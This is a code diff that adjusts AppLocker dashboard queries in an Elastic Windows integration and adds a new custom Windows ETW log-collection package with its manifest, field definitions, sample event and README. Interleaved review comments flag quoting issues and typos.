@@ -1943,7 +2090,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "winlog.provider_name : \"Microsoft-Windows-AppLocker\" " + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -2081,7 +2228,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "layers": [ @@ -2199,7 +2346,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "layers": [ @@ -2318,7 +2465,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "columns": [ @@ -2461,7 +2608,7 @@ "internalReferences": [], "query": { "language": "kuery", - "query": "" + "query": "event.provider : \"Microsoft-Windows-AppLocker\"" }, "visualization": { "emsField": "iso2", diff --git a/packages/windows/manifest.yml b/packages/windows/manifest.yml index 70f30f70946..3c7ca7072f3 100644 --- a/packages/windows/manifest.yml +++ b/packages/windows/manifest.yml @@ -1,6 +1,6 @@ name: windows title: Windows -version: 1.44.1 +version: 1.44.5 description: Collect logs and metrics from Windows OS and services with Elastic Agent. type: integration categories: diff --git a/packages/windows_etw/_dev/build/build.yml b/packages/windows_etw/_dev/build/build.yml new file mode 100644 index 00000000000..71f48ba2a9c --- /dev/null +++ b/packages/windows_etw/_dev/build/build.yml @@ -0,0 +1,4 @@ +dependencies: + ecs: + reference: "git@v8.11.0" + import_mappings: true diff --git a/packages/windows_etw/_dev/build/docs/README.md b/packages/windows_etw/_dev/build/docs/README.md new file mode 100644 index 00000000000..536f7cc43da --- /dev/null +++ b/packages/windows_etw/_dev/build/docs/README.md 
@@ -0,0 +1,27 @@ +# Custom Windows ETW package + +The custom Windows ETW ([Event Tracing for Windows](https://learn.microsoft.com/en-us/windows/win32/etw/event-tracing-portal)) package allows you to ingest events from any ETW provider available. Providers can be listed by running [`logman query providers`](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/logman-query) in any Windows command-line interface. + +This integration currently supports manifest-based, user-mode MOF (classic) and TraceLogging providers while WPP providers are not supported. [`Here`](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing#types-of-providers) you can find more information about the available types of providers. + +It is supported in every Windows versions supported by [`Filebeat`](https://www.elastic.co/support/matrix), starting from Windows 10 and Windows Server 2016. + +This package does not contain any ingest pipeline, so no pre-ingest data processing is applied out of the box. Custom ingest pipelines can be added through the Kibana UI to get the data in the desired format. + +## Configuration + +This integration can interact with ETW in three distinct ways: it can create a new session to capture events from user-mode providers, attach to an already existing session to collect ongoing event data, or read events from a pre-recorded .etl file. For that reason, when configuring the integration there are three parameters that are mutually exclusive, but at least one of them must be set: Provider (Name or GUID), File and Session. + +Event trace level may be specified at `critical`, `error`, `warning`, `information`, or `verbose`. The system will ingest events that correspond to the specified trace level or exceed it in terms of severity. + +Events may be filtered using event masks with the `Match Any Keyword` or `Match All Keyword` parameters. 
The `Match Any Keyword` parameter specifies a 64-bit bitmask where an event is ingested if any of the bits set in this bitmask match any of the keyword bits set in the event's properties, allowing for a broad selection of events based on multiple criteria. Conversely, the `Match All Keyword` parameter requires that all bits set in its 64-bit bitmask match the event's keyword bits for the event to be ingested.The correct format for both fields is `0x` followed by a 16-character hexadecimal number. + +[Here](https://learn.microsoft.com/en-us/windows/win32/api/evntrace/nf-evntrace-enabletraceex2) you can read more information about these parameters. + +The full documentation for the input are available [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-etw.html), including more examples about how to configure it. + +## Fields Mapping + +In addition to the fields specified below, this integration includes the ECS Dynamic Template. Any field that follow the ECS Schema will get assigned the correct index field mapping and does not need to be added manually. + +{{ fields }} diff --git a/packages/windows_etw/agent/input/etw.yml.hbs b/packages/windows_etw/agent/input/etw.yml.hbs new file mode 100644 index 00000000000..d37e058500b --- /dev/null +++ b/packages/windows_etw/agent/input/etw.yml.hbs 
@@ -0,0 +1,40 @@
+condition: ${host.platform} == 'windows'
+
+data_stream:
+ dataset: {{data_stream.dataset}}
+{{#if provider_name}}
+provider.name: {{provider_name}}
+{{/if}}
+{{#if provider_guid}}
+provider.guid: {{provider_guid}}
+{{/if}}
+{{#if session_name}}
+session_name: {{session_name}}
+{{/if}}
+{{#if trace_level}}
+trace_level: {{trace_level}}
+{{/if}}
+{{#if logfile}}
+file: {{logfile}}
+{{/if}}
+{{#if session}}
+session: {{session}}
+{{/if}}
+{{#if match_any_keyword}}
+match_any_keyword: "{{match_any_keyword}}"
+{{/if}}
+{{#if match_all_keyword}}
+match_all_keyword: "{{match_all_keyword}}"
+{{/if}}
+{{#if tags.length}}
+tags:
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{/if}}
+{{#if pipeline}}
+pipeline: {{pipeline}}
+{{/if}}
+{{#if custom}}
+{{custom}}
+{{/if}}
diff --git a/packages/windows_etw/changelog.yml b/packages/windows_etw/changelog.yml
new file mode 100644
index 00000000000..dea84384815
--- /dev/null
+++ b/packages/windows_etw/changelog.yml
@@ -0,0 +1,6 @@
+# newer versions go on top
+- version: "0.1.0"
+ changes:
+ - description: Initial release
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9413
diff --git a/packages/windows_etw/docs/README.md b/packages/windows_etw/docs/README.md
new file mode 100644
index 00000000000..b68465b4ad3
--- /dev/null
+++ b/packages/windows_etw/docs/README.md
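Review bot: `provider.guid: {{provider_guid}}` writes the value as a plain YAML scalar, so a GUID in the brace-wrapped form the manifest's own example gives (`{EB79061A-A566-4698-9119-3ED2807060E7}`) is read as a YAML flow mapping instead of a string, assuming the rendered template is parsed as YAML without further escaping (the quoting already applied to `match_any_keyword` suggests it is). The fix is to quote it the same way, `provider.guid: "{{provider_guid}}"`; `provider.name`, `session_name` and `session` would benefit from the same treatment, since a name containing `: ` or ` #` also breaks a plain scalar. `file: {{logfile}}` should stay unquoted or be single-quoted rather than double-quoted, because backslashes in a Windows path become escape sequences inside YAML double quotes.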
@@ -0,0 +1,99 @@ +# Custom Windows ETW package + +The custom Windows ETW ([Event Tracing for Windows](https://learn.microsoft.com/en-us/windows/win32/etw/event-tracing-portal)) package allows you to ingest events from any ETW provider available. Providers can be listed by running [`logman query providers`](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/logman-query) in any Windows command-line interface. + +This integration currently supports manifest-based, user-mode MOF (classic) and TraceLogging providers while WPP providers are not supported. [`Here`](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing#types-of-providers) you can find more information about the available types of providers. + +It is supported in every Windows versions supported by [`Filebeat`](https://www.elastic.co/support/matrix), starting from Windows 10 and Windows Server 2016. + +This package does not contain any ingest pipeline, so no pre-ingest data processing is applied out of the box. Custom ingest pipelines can be added through the Kibana UI to get the data in the desired format. + +## Configuration + +This integration can interact with ETW in three distinct ways: it can create a new session to capture events from user-mode providers, attach to an already existing session to collect ongoing event data, or read events from a pre-recorded .etl file. For that reason, when configuring the integration there are three parameters that are mutually exclusive, but at least one of them must be set: Provider (Name or GUID), File and Session. + +Event trace level may be specified at `critical`, `error`, `warning`, `information`, or `verbose`. The system will ingest events that correspond to the specified trace level or exceed it in terms of severity. + +Events may be filtered using event masks with the `Match Any Keyword` or `Match All Keyword` parameters. 
The `Match Any Keyword` parameter specifies a 64-bit bitmask where an event is ingested if any of the bits set in this bitmask match any of the keyword bits set in the event's properties, allowing for a broad selection of events based on multiple criteria. Conversely, the `Match All Keyword` parameter requires that all bits set in its 64-bit bitmask match the event's keyword bits for the event to be ingested.The correct format for both fields is `0x` followed by a 16-character hexadecimal number. + +[Here](https://learn.microsoft.com/en-us/windows/win32/api/evntrace/nf-evntrace-enabletraceex2) you can read more information about these parameters. + +The full documentation for the input are available [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-etw.html), including more examples about how to configure it. + +## Fields Mapping + +In addition to the fields specified below, this integration includes the ECS Dynamic Template. Any field that follow the ECS Schema will get assigned the correct index field mapping and does not need to be added manually. + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. 
| keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. 
The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Event dataset. | constant_keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. 
It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). 
| keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | +| log.level | Original log level of the log event. If the source of the event provides a log level or textual severity, this is the one that goes in `log.level`. If your source doesn't specify one, you may put your event transport's severity here (e.g. Syslog severity). Some examples are `warn`, `err`, `i`, `informational`. | keyword | +| tags | List of keywords used to tag each event. | keyword | +| winlog.activity_guid | A globally unique identifier that identifies the current activity. The events that are published with this identifier are part of the same activity. Deprectad in favor of `winlog.activity_id` from 8.14.0, it will be removed in future releases. | keyword | +| winlog.activity_id | A globally unique identifier that identifies the current activity. The events that are published with this identifier are part of the same activity. | keyword | +| winlog.channel | Used to enable special event processing. Channel values below 16 are reserved for use by Microsoft to enable special treatment by the ETW runtime. 
Channel values 16 and above will be ignored by the ETW runtime (treated the same as channel 0) and can be given user-defined semantics. | keyword | +| winlog.event_data | The event-specific data. The content of this object is specific to any provider and event. | object | +| winlog.event_data.Address | | keyword | +| winlog.event_data.AddressLength | | keyword | +| winlog.event_data.DynamicAddress | | keyword | +| winlog.event_data.Index | | keyword | +| winlog.event_data.Interface | | keyword | +| winlog.event_data.TotalServerCount | | keyword | +| winlog.flags | Flags that provide information about the event such as the type of session it was logged to and if the event contains extended data. | keyword | +| winlog.keywords | The keywords are used to indicate an event's membership in a set of event categories. | keyword | +| winlog.opcode | The opcode defined in the event. Task and opcode are typically used to identify the location in the application from where the event was logged. | keyword | +| winlog.process_id | Identifies the process that generated the event. | keyword | +| winlog.provider_guid | A globally unique identifier that identifies the provider that logged the event. | keyword | +| winlog.session | Configured session to forward ETW events from providers to consumers. | keyword | +| winlog.task | The task defined in the event. Task and opcode are typically used to identify the location in the application from where the event was logged. | keyword | +| winlog.thread_id | Identifies the thread that generated the event. | keyword | +| winlog.version | Specify the version of a manifest-based event. | long | + diff --git a/packages/windows_etw/fields/agent.yml b/packages/windows_etw/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/windows_etw/fields/agent.yml 
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/windows_etw/fields/base-fields.yml b/packages/windows_etw/fields/base-fields.yml
new file mode 100644
index 00000000000..b6a962b0f87
--- /dev/null
+++ b/packages/windows_etw/fields/base-fields.yml
@@ -0,0 +1,19 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset.
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: windows_etw
+- name: "@timestamp"
+ type: date
+ description: Event timestamp.
diff --git a/packages/windows_etw/fields/ecs.yml b/packages/windows_etw/fields/ecs.yml
new file mode 100644
index 00000000000..779a00a4af5
--- /dev/null
+++ b/packages/windows_etw/fields/ecs.yml
@@ -0,0 +1,24 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.code
+- external: ecs
+ name: event.created
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.provider
+- external: ecs
+ name: event.severity
+- external: ecs
+ name: event.type
+- external: ecs
+ name: log.file.path
+- external: ecs
+ name: log.level
+- external: ecs
+ name: tags
diff --git a/packages/windows_etw/fields/winlog.yml b/packages/windows_etw/fields/winlog.yml
new file mode 100644
index 00000000000..9f1e870be2b
--- /dev/null
+++ b/packages/windows_etw/fields/winlog.yml
@@ -0,0 +1,90 @@
+- name: winlog
+ type: group
+ description: >
+ All fields specific to the Windows Event Tracing are defined here.
+
+ fields:
+ - name: activity_guid
+ type: keyword
+ description: >
+ A globally unique identifier that identifies the current activity. The events that are published with this identifier are part of the same activity. Deprectad in favor of `winlog.activity_id` from 8.14.0, it will be removed in future releases.
+
+ - name: activity_id
+ type: keyword
+ description: >
+ A globally unique identifier that identifies the current activity. The events that are published with this identifier are part of the same activity.
+
+ - name: channel
+ type: keyword
+ description: >
+ Used to enable special event processing. Channel values below 16 are reserved for use by Microsoft to enable special treatment by the ETW runtime. Channel values 16 and above will be ignored by the ETW runtime (treated the same as channel 0) and can be given user-defined semantics.
+
+ - name: event_data
+ type: object
+ object_type: keyword
+ description: >
+ The event-specific data. The content of this object is specific to any provider and event.
+
+ - name: event_data
+ type: group
+ description: >
+ This is a non-exhaustive list of parameters that are used in Windows events. By having these fields defined in the template they can be used in dashboards and machine-learning jobs.
+
+ fields:
+ - name: Address
+ type: keyword
+ - name: AddressLength
+ type: keyword
+ - name: DynamicAddress
+ type: keyword
+ - name: Index
+ type: keyword
+ - name: Interface
+ type: keyword
+ - name: TotalServerCount
+ type: keyword
+ - name: flags
+ type: keyword
+ description: >
+ Flags that provide information about the event such as the type of session it was logged to and if the event contains extended data.
+
+ - name: keywords
+ type: keyword
+ description: >
+ The keywords are used to indicate an event's membership in a set of event categories.
+
+ - name: opcode
+ type: keyword
+ description: >
+ The opcode defined in the event. Task and opcode are typically used to identify the location in the application from where the event was logged.
+
+ - name: process_id
+ type: keyword
+ description: >
+ Identifies the process that generated the event.
+
+ - name: provider_guid
+ type: keyword
+ description: >
+ A globally unique identifier that identifies the provider that logged the event.
+
+ - name: session
+ type: keyword
+ description: >
+ Configured session to forward ETW events from providers to consumers.
+
+ - name: task
+ type: keyword
+ description: >
+ The task defined in the event. Task and opcode are typically used to identify the location in the application from where the event was logged.
+
+ - name: thread_id
+ type: keyword
+ description: >
+ Identifies the thread that generated the event.
+
+ - name: version
+ type: long
+ description: >
+ Specify the version of a manifest-based event.
+
diff --git a/packages/windows_etw/img/logo_windows.svg b/packages/windows_etw/img/logo_windows.svg
new file mode 100644
index 00000000000..953b33d8f5a
--- /dev/null
+++ b/packages/windows_etw/img/logo_windows.svg
@@ -0,0 +1,3 @@
+
+
+
diff --git a/packages/windows_etw/kibana/tags.yml b/packages/windows_etw/kibana/tags.yml
new file mode 100644
index 00000000000..47f20a8f551
--- /dev/null
+++ b/packages/windows_etw/kibana/tags.yml
@@ -0,0 +1,4 @@
+- text: Security Solution
+ asset_types:
+ - dashboard
+ - search
diff --git a/packages/windows_etw/manifest.yml b/packages/windows_etw/manifest.yml
new file mode 100644
index 00000000000..d38dff14522
--- /dev/null
+++ b/packages/windows_etw/manifest.yml
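Review bot: The `activity_guid` description misspells "Deprectad"; since docs/README.md is generated from these field files the same typo lands in its field table, so replacing `Deprectad` with `Deprecated` here fixes both. A second, hedged remark on the `event_data` entries: it is declared once as an `object` with `object_type: keyword` and once as a `group` listing a handful of DNS-client parameters, and the object mapping means every distinct key an arbitrary provider emits becomes a new dynamic field; I can't tell from this hunk whether the package documents the resulting field-count growth, but a sentence on it in the `event_data` description would help operators pointing this input at chatty providers.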
@@ -0,0 +1,119 @@
+format_version: 3.1.0
+name: windows_etw
+title: Custom Windows ETW logs
+description: Collect and parse logs from any Windows ETW provider with Elastic Agent.
+type: input
+version: 0.1.0
+conditions:
+ kibana:
+ version: ^8.13.0
+categories:
+ - custom
+ - os_system
+policy_templates:
+ - name: etw
+ type: logs
+ title: Custom Windows ETW logs
+ description: Collect custom Windows ETW logs.
+ input: etw
+ template_path: etw.yml.hbs
+ vars:
+ - name: provider_name
+ type: text
+ title: Provider Name
+ description: >-
+ Name of of an ETW provider (eg. Microsoft-Windows-DNSServer). Run `logman query providers` to list the available providers in the endpoint.
+ required: false
+ show_user: true
+ - name: provider_guid
+ type: text
+ title: Provider GUID
+ description: >-
+ GUID of of an ETW provider (eg. `{EB79061A-A566-4698-9119-3ED2807060E7}`). Run `logman query providers` to list the available providers in the endpoint.
+ required: false
+ show_user: true
+ - name: session_name
+ type: text
+ title: Session Name
+ description: >-
+ When specifying a provider, a new session is created. This controls the name for the new ETW session it will create. If not specified, the session will be named using the provider ID prefixed by 'Elastic-'.
+ required: false
+ show_user: true
+ - name: logfile
+ type: text
+ title: File
+ description: >-
+ Path to an .etl file to read from.
+ required: false
+ show_user: true
+ - name: session
+ type: text
+ title: Session
+ description: >-
+ An existing ETW session to read from. Existing sessions can be listed using `logman query -ets`.
+ required: false
+ show_user: true
+ - name: trace_level
+ type: text
+ title: Trace Level
+ description: >-
+ Defines the filtering level for events based on severity. Valid options include critical, error, warning, information, and verbose. The provider writes an event if the event's level is more severe or equal to the defined value.
+ default: information
+ required: false
+ show_user: true
+ - name: match_any_keyword
+ type: text
+ title: Match Any Keyword
+ description: >-
+ An 8-byte bitmask used for filtering events from specific provider subcomponents based on keyword matching. Any matching keyword will enable the event to be written. Default value is `0xfffffffffffffffff` so it matches every available keyword. Run `logman query providers ""` to list the available keywords for a specific provider.
+ default: "0xffffffffffffffff"
+ required: false
+ show_user: false
+ - name: match_all_keyword
+ type: text
+ title: Match All Keyword
+ description: >-
+ Similar to MatchAnyKeyword, this 8-byte bitmask filters events that match all specified keyword bits. Default value is 0 to let every event pass. Run `logman query providers ""` to list the available keywords for a specific provider.
+ default: "0x0000000000000000"
+ required: false
+ show_user: false
+ - name: data_stream.dataset
+ type: text
+ title: Dataset name
+ description: >-
+ Dataset to write data to. Changing the dataset will send the data to a different index. You can't use `-` in the name of a dataset and only valid characters for [Elasticsearch index names](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-index_.html).
+ default: etw.winlog
+ required: true
+ show_user: true
+ - name: pipeline
+ type: text
+ show_user: true
+ title: Ingest Pipeline
+ description: |
+ The Ingest Node pipeline ID to be used by the integration.
+ - name: tags
+ type: text
+ title: Tags
+ description: Tags to include in the published event.
+ required: false
+ multi: true
+ show_user: false
+ - name: custom
+ type: yaml
+ title: Custom Configurations
+ description: >-
+ Here YAML configuration options can be used to be added to your configuration. Be careful using this as it might break your configuration file.
+ required: false
+ show_user: false
+ default: |-
+ # Configuration example
+ #processors:
+ # - drop_event.when.not.or:
+ # - equals.event.code: '903'
+ # - equals.event.code: '1024'
+icons:
+ - src: "/img/logo_windows.svg"
+ type: "image/svg+xml"
+owner:
+ github: elastic/sec-windows-platform
+ type: elastic
diff --git a/packages/windows_etw/sample_event.json b/packages/windows_etw/sample_event.json
new file mode 100644
index 00000000000..062f093d827
--- /dev/null
+++ b/packages/windows_etw/sample_event.json
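Review bot: The `match_any_keyword` description states the default as `0xfffffffffffffffff` (17 hex digits), which contradicts the `default: "0xffffffffffffffff"` line directly below it and the "`0x` followed by a 16-character hexadecimal number" format the README gives; the sentence should read `Default value is 0xffffffffffffffff so it matches every available keyword.` The `provider_name` and `provider_guid` descriptions both say "of of an ETW provider" — drop the duplicated word. Both keyword descriptions also show `logman query providers ""` with an empty quoted argument; presumably a provider-name placeholder was intended, e.g. `logman query providers "<provider name>"`. The README says at least one of provider, file or session must be set, yet all three vars are `required: false`; if the manifest schema cannot express that constraint, a sentence in the `provider_name` description telling the user which input-side error to expect would be useful.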
@@ -0,0 +1,72 @@ +{ + "@timestamp": "2024-03-20T09:41:40.009Z", + "ecs": { + "version": "8.0.0" + }, + "log": { + "level": "information" + }, + "data_stream": { + "namespace": "default", + "type": "logs", + "dataset": "etw.winlog" + }, + "elastic_agent": { + "id": "fab64289-aeff-4492-8f6c-be1c578898d8", + "version": "8.13.0", + "snapshot": true + }, + "event": { + "severity": 4, + "agent_id_status": "verified", + "ingested": "2024-03-20T09:41:52Z", + "code": "1001", + "provider": "Microsoft-Windows-DNS-Client", + "created": "2024-03-20T09:41:42.098Z", + "kind": "event", + "dataset": "etw.winlog" + }, + "host": { + "hostname": "ec2amaz-253cq8c", + "os": { + "build": "20348.2322", + "kernel": "10.0.20348.2322 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Datacenter", + "type": "windows", + "family": "windows", + "version": "10.0", + "platform": "windows" + }, + "ip": [ + "fe80::dd4a:8121:e72b:6f21", + "172.31.87.64" + ], + "name": "ec2amaz-253cq8c", + "id": "6e134718-e196-4a81-8c7d-db595a4b6452", + "mac": [ + "12-7E-D2-0B-F3-35" + ], + "architecture": "x86_64" + }, + "winlog": { + "process_id": "1688", + "thread_id": "3492", + "task": "1001", + "keywords": "9223372036854775808", + "provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}", + "session": "ETW-DNS-Client", + "activity_id": "{00000000-0000-0000-0000-000000000000}", + "channel": "16", + "flags": "576", + "event_data": { + "AddressLength": "16", + "TotalServerCount": "1", + "Address": "172.31.0.2", + "Index": "1", + "DynamicAddress": "dynamic ", + "Interface": "Ethernet 2" + }, + "opcode": "0", + "version": 0 + } +} diff --git a/packages/windows_etw/validation.yml b/packages/windows_etw/validation.yml new file mode 100644 index 00000000000..a96151416a6 --- /dev/null +++ b/packages/windows_etw/validation.yml @@ -0,0 +1,3 @@ +errors: + exclude_checks: + - SVR00005 # Kibana version for saved tags. 
